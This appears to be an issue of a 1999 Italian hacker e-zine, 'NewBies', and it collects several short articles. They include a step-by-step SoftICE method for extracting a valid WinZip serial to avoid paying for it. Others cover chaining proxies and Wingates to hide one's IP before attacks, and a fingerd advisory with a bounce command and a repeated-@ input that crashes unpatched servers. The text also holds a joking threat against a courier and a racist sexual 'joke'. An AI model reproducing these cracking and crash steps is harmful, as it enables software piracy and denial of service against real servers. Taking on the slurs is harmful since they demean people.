A SCUOLA PER OLTRE 80min PER FARE UN FOTTUTO ESAME ORALE (IL MIO
MASTERIZZATORE CI IMPIEGA MENO A SCRIVERE 80min! CAZZOOOO)

cod/e-ViP
02 08 1999
Ore 17:21

P.S. ora chiamo x vedere se il masterizzatore nuovo Š arrivato a consegna
altrimenti giuro che se becco dove abito un corriere Bartolini prendo il
fucile e gli sparo all'autista!
P.P.S. Fottuta EVA!! Risponde la segreteria telefonica! E ho sul disco fisso
oltre 3 giga da masterizzare pi— il il secondo volume della raccolta pi—
pazza che ci sia (tutti gli strumenti x crackare e scrivere virus!)

http://members.xoom.it/evip
cod@gurlmail.com

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ MA XCHE' SBORSARE 29 DOLLARI PER REGISTRARE WINZIPPO ???? ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Dopo aver letto questo tutor non avrete + bisogno di cercare on the net
i serial per WinZip. Potremo usufruire di Username/Serial personalizzati.

Strumenti necessari: (Mitico) SoFtiCe, WinZip, 5 minuti di tempo.

Procuratevi la versione 7.0 SR-1 del famoso WinZip (io ho usato questa) e
installatela.
Riavviate in modalita' MS-DOS e lanciate Softice.
Aprite WinZip e clikkate su Enter Registration Code, quindi inserite un
vostro nome.
Io usero' come nome DeViLNeT. Dove dice Registration # mettete un numero a
caso es. 12345678
Ora premete CTRL+D e scrivete
BPX GETDLGITEMTEXTA (invio)
Uscite da softice ripremendo CTRL+D
Tornate a Winzip e clikkate su OK
Riapparira' la finestra di softice
Premete una volta F12
poi scivete:
BC * (invio)
BPX 407c43 (invio)
e premete CTRL+D
Ora vi trovate sulla stringa 407c43
Bastera' srivere
D EAX (invio)
ed ecco in basso sulla destra apparire il nostro Serial
Nel mio caso sara' B6DC09AC
Scrivete il serial su un pezzo di carta
digitate
BC * (invio)
uscite da softice con CTRL+D
ora al posto di 12345678 scrivete il vostro serial
Click su ok
WOW
WinZip Registrato !!!
In 5 min abbiamo risparmiato 29 Dollari . . .
Alla prossima

DeViLNeT
devilnet@freemail.it

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ APPROFONDIMENTO SULLE CHIAVI HASP ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ


musica di supporto morale: Machine Head, Korn, Manowar,Helloween,Angra,
Dickinson.
saluto tutti i menbri di Crack-It ed in particolare i r|ngzeristi, ^courier,
YaDo e Furb3t che mi ha spinto a scrivere questo 'tut'.

Scrivo questo testo con il solo scopo didattico (hehehe), quindi, se fate
qualche cazzata con questo testo ,be', cazzi vostri. Il mio obiettivo e'
mostrare ai programmatori il funzionamento delle chiavi hasp in modo che,
conoscendole meglio imparino a proteggere al meglio i propri prog, impedendo
che questi vengano reversati.

Per ogni critica(costruttiva) scrivetemi a black_druid@hotmail.com.

Evitate di mandarmi insulti per cio' che ho scritto, se pensate che non serva
a un cazzo, smettete di leggere ora.

Argomenti trattati:

1.Introduzione alle chiavi
2.Metodi di protezione
3-Funzionamento
4-PCS

Introduzione alle chiavi Hasp

Le Hasp sono tra le migliori chiavi di protezione del software poiche', a
differenza di altre utilizzano + metodi di protezione simultaneamente.

Caratteristiche comuni delle hasp:

-Il codice (Developer Code) che viene assegnato ad un acquirente e' univoco e
non modificabile poiche' e 'salvato' all'interno di un ASIC (Application
Specific Integrated Circuit) cioe' un circuito che si trova all'interno della
chiave.In questo modo, anche smontando la chiave e' impossibile vedere tale
codice.

-Le password fornite con la chiave sono 2 e anch'esse non modificabili.

-I metodi di protezione sono 2: Envelope e API.

-Ogni chiave ha un ID number univoco.

-Le hasp supportano una grande quantita' di compilatori.

-Le hasp supportano diverse piattaforme(ibm pc, unix, apple e nec)

-Utilizzo di algoritmi di protezione avanzati e di tecniche anti debugging
sviluppati direttamente dalla casa costruttrice.

-Utilizzo di comunicazioni criptate: le comunicazioni tra l'applicazione e la
chiave e' criptata impedendo cosi' l'emulazione software della chiave.

In commercio esistono numerosi tipi di hasp che si differenziano per le loro
caratteristiche ma che hanno di base tutte le funzionalita' sopra descritte:

-Hasp-3: la hasp + economica, senza memoria.

-Hasp36:come la hasp3 ma utilizzata sui nec pc

-MemoHasp: hasp dotate di una memoria di lettura/scrittura utilizzabile anche
run-time

Le MemoHasp si suddividono in MemoHasp-1(con 112 byte di memoria) e MemoHasp-4
(496 byte di mem).

-NetHasp: come le MemoHasp-4 ma con alcune funzionalita' in piu':

-connettendo una sola chiave ad un computer facente parte di una rete, l'hasp
e' in grado di proteggere un software e limitare il numero dei pc che possono
usare tale applicazione.

-TimeHasp e TimeHasp-4: dotate di un real time clock che le rendono
particolarmente adatte alla protezione time-limited demo. Hanno una zona di
memoria di 16 byte che contiene informazioni sulla data di 'scadenza' di
un'appl. (le TimrHasp-4 hanno un'altra zona di memoria di 496 byte).

Pausa, vado un attimo a bere, torno subito.

Metodi di protezione

1-Envelope
il metodo envelope consiste nel proteggere e criptare uno o piu' EXE (o anche
Win DLL) dell'applicazione in modo da renderla (secondo i tecnici hasp) non
debuggabile e non disassemblabile .

2-API
questo metodo consiste nell' utilizzare le API specificatamente create per le
hasp all' interno di un'applic.
Attraverso le API si possono inserire call all'interno del prog da proteggere
per verificare la presenza della chiave, verificare le password, ecc.
Le api supportano una grossa quantita' di compilatori e sistemi operativi :
dos, windoz, windoz32, os/2;
Ah, dimenticavo, le api sono protette e criptate.

E' possibile utilizzare entrambi i metodi di protezione (soluzione piu'
sicura) oppure uno dei due.
Le chiavi hasp consentono inoltre di utilizzare il metodo PCS (pattern code
security) che spiegero' in dettaglio piu' avanti.

Le Hasp come ho gia' scritto sopra impediscono il debugging ed il
disassembling del codice in questo modo:
-'bloccando' gli interrupt del debugger rendendo difficile l'attivazione del
debugger stesso.

-implementando 'trappole' speciali per gli hardware debugger.

-rendendo difficile il tracing del codice.

-utilizzando delle 'trappole a tempo'

-usando il PCS

-rilasciando spesso nuove release con nuovi metodi di protezione

-inserendo il virus ebola all'interno della chiave e liberandolo all'esterno
ad ogni tentativo di reversing riscontrato.

-allegando al pacco contenente la chiave un negrone di 2 metri particolarmen
te dotato che si diverte col tuo culo in caso ti veda reversare

N.B. gli ultimi 2 metodi di protezione sono ancora in fase di studio e
verranno rilasciati solo con la release 7.0 (la casa produttrice dell'hasp
cerca urgentemente volontari per testare i due nuovi metodi)

Funzionamento

Allora, come ho gia' scritto prima, ogni acquirente ha un codice (Developer
code) univoco e non modificabile.
All'interno di ogni chiave c'e' un circuito che contiene un algoritmo per la
generazione di valori di ritorno e tale algoritmo si basa sul Dev Code.
Per verificare che la chiave connessa sia effettivamente quella giusta,
all'interno dell'applicazione invio alla chiave una o piu' call passandogli
come parametro 1 numero casuale(seed code); il numero passatogli viene
utilizzato (dal circuito con l'algoritmo) per calcolare 4 codici di ritorno
che andro' a verificare per vedere se la chiave connessa e' quella giusta.
Per rendere piu' dura la vita del reverser si devono usare le funzioni messe
a disposizione dalla casa produttrice dell'hasp cioe' bisogna eseguire spesso
call per verificare i valori di ritorno (cambiando il seed code ogni volta),
fare un check sull'id della chiave ecc. Per migliorare la protezione, il check
dei valori di ritorno ed il seed value dovrebbero essere criptati e cambiati
ogni volta (es. prendendo il valore della data attuale o dell' ora in modo
che il prog abbia un numero pressoche' infinito d codici).
Ovviamente due chiavi con Dev Code diversi, eseguendo una call con seed code
uguale, rirorneranno dei valori diversi dato che l'algoritmo di computazione
dei 4 valori di ritorno si basa sul Dev Code.

PCS

Per rendere ancora piu' duro il reversing delle chiavi hasp, quei quattro
pirla degli sviluppatori hasp, hanno implementato una funzione chiamata pcs
per cercar di far sclerare il reverser durante il tracing del codice.

Infatti mentre senza pcs il funzionamento e' il seguente:

1 Chiamata alla procedura di protezione

2.verifica dei codici di ritorno

3.esecuzione di una determinata azione se i codici sono errati (chiudere
l'appl, ecc).

Con il pcs invece ad ogni chiamata di funzione, come per magia ne vengono
generate un numero a scelta tra 1 e 25 ognuno con un seed code differente;
non solo ma vengono generate in diversi punti del codice quindi son cazzi
amari.

bene, e' tutto raga, se volete ulteriori informazioni (anche sulle smart
card) o chiarimenti scrivetemi a

black_druid@hotmail.com oppure mi trovate in irc nel canale Crack-it

spero che cio' che ho scritto sia stato in qualche modo utile a qualcuno
altrimenti, be', me ne sbatto le palle.

BlackDruiD.

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°°°°ÛÛÛÛ°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛ°°°°ÛÛ°°°°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛ°°°°°°°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°°°°°ÛÛ°°°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SOX...WINGAYZ E PROXY...CHE CONFUSIONE... ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Lo sapete che sto inkominciando a rompermi un po' le bolle della mia
intro con le dediche ?
ki se ne frega...sono skizzato..la faccio lo stesso....

tHiS aRt i5 dEd 2: NoboZ accanto a me che scura meglio di un maiale e che
ha trasformato in okkasione del 54ø anniversario di
Hiroshima la nostra stanza in un revival dell'epoca!!!

Th|$ 4RT |$ Vs-DeD To: Tutti coloro che mi hanno detto: quello che scopri
di hacking tienitelo per te!

Rotto di palle dalle incessanti domande su IRC tra le differenze tra
questi 3 sconosciuti mi accingo con flautolenza a scrivere quelle penso
siano le principali differenze tra di loro.
Scusate le eventuale lamerate....caxxate o fesserie varie...ho fatto
tutto in buona fede..... :)
Innanzi tutto partiamo da cio' che li accomuna: il coprire il vostro ip.

Partiamo dai proxy....
^^^^^^^^^^^^^^^^^^^^^^
I proxys sono dei particolari servizi offerti da dei server per viaggiare
anonimi nel web o scaricare senza log tramite ftp.
Settarne uno e' semplicemente una stupidata.....prendetene uno qualsiasi
(proxys4all.cgi.net) andate nelle opzioni di internet del vostro browser
preferito e settate come proxy l'ip del server che offre il servizio
e come porta la famosa 8080 o anke la 80.....cambia da server a server
ma di solito sono sempre queste 2 dato che il servizio http di un server
si puo' normalmente trovare sulla porta 80.
Usare un proxy e' estremamente utile se si vuole provare un attaco tramite
exploit remoto del proggie phf.

I SoX
^^^^^
I Socks hanno la stessa identica funzione dei proxy ma essi sono comunemente
usati in IRC. Trovato un particolare ip che abbia la porta 1080 aperta
potrete selezionare nelle opzioni del vostro client IRC l'opzione firewall
selezionare usa sock 4 ed immettere al posto del firewall l'ip con la 1080
aperta e come porta....indovinate quale ???
Provate ora a joinare un canale e a chiamare voi stessi in query....noterete
che il vostro ip Š diventato quello del server utilizzato....e ki vuole
nukkarvi o floodarvi ora come fa ?Si spara le pugnette e se e' un lamer
non accorgendosi dello strano ip cerchera' di floodare il server e voi avrete
il qoolo parato.

Il preservativo dell'hacker: il Wingate

Avete bisogno di telnettarvi ad un sistema....volete coprire il vostro ip...
come fare ??? Wingate!
Mi avrete gia' preso per un pazzo maniaco sessuale ed in effetti avete
proprio ragione ma le analogie tra un Wingate ed un preservativo sono
molte.
Immaginiate che il server sia una mignottona che cerca di rimanere incinta
per poi sposarvi (rimanere loggati)....voi ovviamente non volete rimanere
legati a questa persona per tutta la vita anzi siete dei grandi playboy ed
avete una gran voglia di farvi altre 1000 femmine....bene...cosa usate per
evitare cio' ?
Il mitico condom...alias in rete...wingate....
Telnettatevi ad un server che voi sapete offra questo servizio sulla porta
23 e avrete un prompt di questo tipo Wingate:$>
adesso dovrete solo immettere l'ip del server a cui volete telnettarvi
con, seguito da uno spazio, la porta alla quale vi volete connettere
e tutto vi sembrera' + bello ! heheh......
Ma ogni tanto i presevativi si bukano no ? e allora voi per stare + sicuri
cosa fate ? 'mannate a fangoolo la parsimonia e ne usate + di uno insieme...
stessa cosa facciamo noi nell'hackin'....ne paghiamo in perdita di velocita'
ed inkominciamo a telnettarci da un Gate all'altro fino a poi ad arrivare
al server che in realta' ci vogliamo pompare....

Battuta demente: Sai dove va a fare benzina l'hacker ??? alla shell.

Basta basta basta.....ci vediamo un'altra sera...ciao...bye bye bye bye bye

.......DaNtUccIo AliGhIeRiNo.......

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ ER COSIDDETTO MONITORAGGIO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Eccovi un bell'articoletto tutto x voi sysadmin e x voi hacker dagli
occhi e dal cervello bramosi di conoscenza...oggi vi parlero' di...

ER COSIDDETTO (MOLTO RICHIESTO MA MOLTO IGNORATO) MONITORAGGIO

...ovvero come vivere felici senza sentirsi bruciare il culo ogni volta che
qualke quattordicenne in cerca di gloria ti fotte il sistema...

Il monitoraggio della sicurezza consiste nella ricerca continua di bug, bachi,
vulnerabilita', problemi e ovviamente di soluzioni ai problemi riscontrati
all'interno del proprio sistema.
Ci sono diversi metodi e strumenti da utilizzare e di questi io andro' solo
a elencarvi la lista e l'utilizzo o lo scopo di ognuno dato che scendero' in
ognuno degli argomenti della lista nei prossimi numeri di NewBies, quindi non
aspettatevi troppo da questo articolo, che, come appena detto, vuole essere
solo un index con qualche precisazione in piu'. Ecco a voi la lista:

{[>-<]}- controllo dei log = il controllo dei log puo' essere definita come la
parte + importante nella manutenzione del nostro
sistema e va considerato il metodo + d'aiuto nel
cercare se qualcuno e' entrato nel nostro sistema
lasciando tracce nei log. A questo proposito va
detto che e' molto utile installare dei log
aggiuntivi normali e magari farsi in c un program
ma che cripti un altro log aggiuntivo cosi' che
l'hacker del momento non riesca a cancellare il
proprio ip o l'user usato x entrare cosi' che,
nel momento in cui diventi root e si accorga del
log criptato, debba x forza di cose cancellare
l'intero file e quindi scoprirsi ai vs occhi di
sysadmin (che non siete altro :P).

{[>-<]}- antivirus: ovviamente servono x ricercare virus nel vostro sistema e
sono + utili di quanto si pensi...ovviamente se incontrate
un virus serio non servono a niente ma di solito chi e'
bravo e fa virus "da paura" non li da' in giro ma li fa
solo x dimostrare a se' stesso che e' un ottimo programma
tore e che riesce a creare qualcosa di nuovo...

{[>-<]}-password crackers: servono a prevenire il cracking delle password,
ovvero l'operazione tramite la quale si cerca di
scoprire le password confrontandole con quelle +
comuni e con dei dizionari di

  
pass + usate a 2a
della lingua usata nel paese dove e' situato il
sito e / o server quindi una volta appurata la
semplicita' della password (molte volte coinciden
te o cmq simile al login o al nome del utente reale)
questa va segnalata all'utente che dovra' quindi
provvedere a cambiarla e dopo di cio' si provvedera'
a rifare l'operazione detta "vediamo se mi trovo
la pass brutto bastardo"
;)

{[>-<]}-uso di prog che rilevano eventuali intrusioni: questa operazione
consiste principalmente nell'uso di programmi
che analizzano ben benino tutti i vari log e i
registri segnalando i vari problemi e/o intrusioni
e a volte anke parametri di configurazione sbaglia
ti o "troppo permissivi" segnalandone quindi i
vari bug scoperti (esempio: satan) e i possibili
programmi che usati in un certo modo (cioe'
tramite l'uso di exploit) potrebbero servire
x eventuali attacchi e intrusioni. Le soluzioni
quindi sono controllare se ci sono nuove versioni
x i prog trovati "exploitabili" o verificarne la
eventuale necessita' che in poke parole vuol dire
"se non ve serve che lo tenete affa????".

{[>-<]}- conta-lunghezza-file: di questa categoria fanno parte dei programmi
che non fanno altro (come fosse poco) che rile
vare la lunghezza di ogni file presente sul vs
sistema e di salvare tutti i numeri delle varie
lunghezze dei file in un unico file e/o db con
il quale fare delle verifiche periodiche ricon
trollando le varie dimensione e stanando quindi
eventuali manipolazioni causate da errori o
anke da possibili "hackers". Basti pensare che
molti di quei piratoni che ci sono la' fuori
esaminano il sorgente di qualke programma inuti
le (ovviamente non progs come cat, ls o cp!)
dopodiche' li modificano introducendoci delle
backdoor che gli permetteranno in futuro di
diventar root scrivendo solo il comando con
qualke stringa da loro immessa nel falso prog
che e' andato a sostituire l'originale. E
ovviamente questo non piacerebbe che succedesse
proprio al ns server...o no =)))) La stessa
procedura ovviamente puo' essere utile per
scoprire eventuali virus o danneggiamenti
vari fatti senza volerlo da utenti poco
esperti o solo molto sbadati.

{[>-<]}-configurazione del sistema: questa e' una delle parti piu' importanti
nell'amministrazione di un sistema *nix e
ricordatevi che nel 80% dei casi in cui un
hacker vi brucia le chiappe e' dovuto al
fatto che avete fatto una mala configuraz
troppo permissiva oppure avete dimenticato
di togliere qualke servizio, poike' anke
solo il fatto di lasciare aperta la porta
x fingare aiuta l'eventuale smanettone al
lavoro nel conoscere gli utenti e quindi
a sapere + info da utilizzare x tentare
di scovare la loro pass. Se volete sapere
la mia una configurazione perfetta c'e'
...provate a lasciare il server sconnesso
con la spina staccata in una camera blinda
ta tipo quelle delle bancke e poi venitemi
a dire che vi hanno hackerato! hihihihihi

{[>-<]}-aggiornamento software e mentale: oltre al cercare di avere sempre le
ultime release dei progs del vs sistema
cercate anke di documentarvi sulle varie
mailing list dedite alla sicurezza infor
matica e ai vari troian e virus e cercate
di leggere tutti i vari bollettini delle
sw-h come ad esempio quella microsoft (so
che essendo in ambint *nix non serviranno
a niente ma se e' vero che 5 minuti di
risate allugano la vita allora avrete vita
eterna....ahahahahahahahahahahahaha).

FONTI : il mio cervello, varie riviste "del settore" di cui non so i nomi cioe'
non ricordo dove o preso le info ma qui ho fatto un riassunto di cio'
che ho imparato quindi alcune e-zine dal 93 in poi americane di cui
mi sono appassionato ultimamente e che..non erano poi tanto male :)

I RINGRAZIAMENTI QUESTA VOLTA VANNO A: Eugenio-Yago, Rigor MorteM, /sPIRIT/,
(IN RIGOROSO ORDINE SPARSO) Vanadio, NightTiger, LordFelix, Dantuz,
Blinking, DevilNet, Storm, drwxr--r--,
Cod, Barninga Z, Vecna, Spymaster,
VaFfa, Harlok, Blum, BlackJam, Ennaro,
tutti gli Spp, tutti i BFI, e tutti
quelli di #hackernow e tutti quelli
che mi hanno chiesto se usciva NB4 :)

I MAVATTINNNACHITTEMMUORTTT VANNO A: tutti quelli che mi hanno detto di non
continuare NB, che, non sapendo, mi hanno
dato quella marcia in + x riorganizzare
(o meglio x riunire un po') il gruppo di
amici NewBies.

QUESTO ARTICOLO E' STATO FATTO PERCHE': ...dopo 30 min di telefonata con RigoR
MorteM tutto e' possibile...

Byez N0bodY88 proud newbies of NewBies Staff

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°ÛÛÛÛÛÛÛÛ°ÛÛÛÛÛ°°°°°ÛÛ°°°°°ÛÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛÛ°ÛÛ°ÛÛÛÛÛ°ÛÛ°°°Û°ÛÛ°°°°°°°°²
²°°°°°°°°ÛÛ°°°°ÛÛ°°Û°°°°ÛÛÛÛ°°°°ÛÛ°Û°°ÛÛ°°ÛÛ°°°°ÛÛ°ÛÛ°Û°°°Û°ÛÛÛ°°Û°ÛÛ°°°°°°°°²
²°°°°°°°°ÛÛ°°°°ÛÛÛÛÛ°°°ÛÛ°°ÛÛ°°°ÛÛ°°Û°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛ°Û°°°Û°Û°ÛÛ°Û°ÛÛ°°°°°°°°²
²°°°°°°°°ÛÛ°°°°ÛÛ°Û°°°ÛÛÛÛÛÛÛÛ°°ÛÛ°Û°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°Û°°°Û°Û°°ÛÛÛ°ÛÛ°°°°°°°°²
²°°°°°°°°ÛÛ°°°°ÛÛ°°Û°ÛÛ°°°°°°ÛÛ°ÛÛÛ°°°ÛÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛ°ÛÛÛÛÛ°Û°°°ÛÛ°ÛÛ°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME CAMBIARE IL NOME DI REGISTRAZIONE DI WINDOWS 95 E 98 ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

IL tuo pc e' arrivato con windows 95/98 preinstallato?

Non prendertela se vedi che sei registrato come OEMuser o qualche
altro nome senza senso! O sei pentito che quando hai installato il
tuo windows, ti sei registrato sotto il tuo vero nome?

In ogni modo, cio' puo' essere rimediato. Questo e' quanto:

1. Fai una copia o + di backuo del tuo regedit di windows. Non
sto scherzando.

2. Aprite regedit (seleziona Avvio/Start), scrivi regedit dopo
aver scelto esegui, e premi invio.

3. Sotto HKEY_LOCAL_MACHINE, seleziona Software/Microsoft/Windows/CurrentVersion.

4. Fate doppio-click sulla RegisteredOrganization o sulle opzioni
RegisteredOwner, e inserite i vostri cambiamenti.

5. Uscite, e riavviate windows.

Se volete cambiare le informazioni dell'utente registrato x altri
software, potete cercare in giro x la chiave software. Ma fate
solamente un cambiamento alla volta, e ricordate di FARE SEMPRE
IL BACKUP DEL REGEDIT!!!

AUTORE = sconosciuto TRADUTTORE = N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ FINGERD EXPLOIT ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Piattaforma: Qualsiasi piattaforma che faccia girare un non patchato fingerd

Descrizione: Usare finger da remoto permette molteplici @, e permette bogus
finger comandi.

Exploit: Usando diversi login tu puoi farli apparire come un utente su hut.fi
che sta usando il finger su un utente di nonhut.fi come questo:

>finger jabba@hut.fi@nonhut.fi

Questo puo' causare il crash di un server usando il riutilizzo
del finger come in questo modo:

>finger jabba@@@@@@@@@@@hut.fi

Fix: Rimuovere finger dall' inetd.conf e killarlo.

Patch?: http://prep.ai.mit.edu/pub/gnu/finger-1.37.tar.gz

Source: Non ricordo.

Questa traduzione e' stata fatta da N0bodY88 su un testo inglese di non so chi
(l'autore non e' presente nel doc originale). Chi fosse a conoscenza del
l'autore di tale doc mi faccia sapere che lo mettero' sul numero successivo
di NewBies, dato che mi sta sul cax chi prende spunti e/o traduce e poi non
da le fonti e i dovuti riconoscimenti...e magari fa spacciare il tutto come
opera del proprio "ingegno"...

Byez N0bodY88

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
